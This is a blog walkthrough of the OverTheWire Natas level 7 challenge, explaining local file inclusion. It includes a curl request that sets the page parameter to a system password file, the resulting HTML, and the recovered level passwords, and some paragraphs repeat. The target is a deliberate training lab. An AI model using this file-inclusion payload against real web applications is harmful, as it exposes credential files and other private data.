| << Previous challenge |
Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas7.natas.labs.overthewire.org and take a look at its content. Now that we have some familiarity with PHP, it's time throw in a vulnerability know as local file inclusion, let's get started.
Level 07 is a simple page with a menu, Home and About. Navigation on the page is done by passing parameters on a GET Request to index.php file, you can see that the URL changes:
The yellow background shows what GET parameters are passed. I'll leave it to you to try and navigate to /home and /about. Another tip is commented on the source, I'll also leave it to you.
Our guess here is that the page does some include depending on the requested page. I hope that by now things are pretty obvious (if you read the tip in the source code), the only thing we need is to make a request where the page=/etc/natas_webpass/natas8. You can simply make it through the browser or using curl:
And our result:
The contents of natas8 file is included on the page, as you can see in line 19.
Level 07 is a simple page with a menu, Home and About. Navigation on the page is done by passing parameters on a GET Request to index.php file, you can see that the URL changes:
http://natas7.natas.labs.overthewire.org/index.php?page=home http://natas7.natas.labs.overthewire.org/index.php?page=about
Our guess here is that the page does some include depending on the requested page. I hope that by now things are pretty obvious (if you read the tip in the source code), the only thing we need is to make a request where the page=/etc/natas_webpass/natas8. You can simply make it through the browser or using curl:
curl "http://natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9@natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head> <body> <h1>natas7</h1> <div id="content"> <a href="index.php?page=home">Home</a> <a href="index.php?page=about">About</a> <br> <br> DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 --> </div> </body> </html> |
| User | natas8 |
| Password | DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe |
Another challenge down, interesting one, but pretty simple. This type of vulnerabilities usually arise from poor coding practices. If you check the link in the recommended reading, it explains how to avoid this vulnerability.
This file inclusion vulnerability is basically the same as directory traversal, in case you're wondering.
Never Settle,
| << Previous challenge |
No comments:
Post a Comment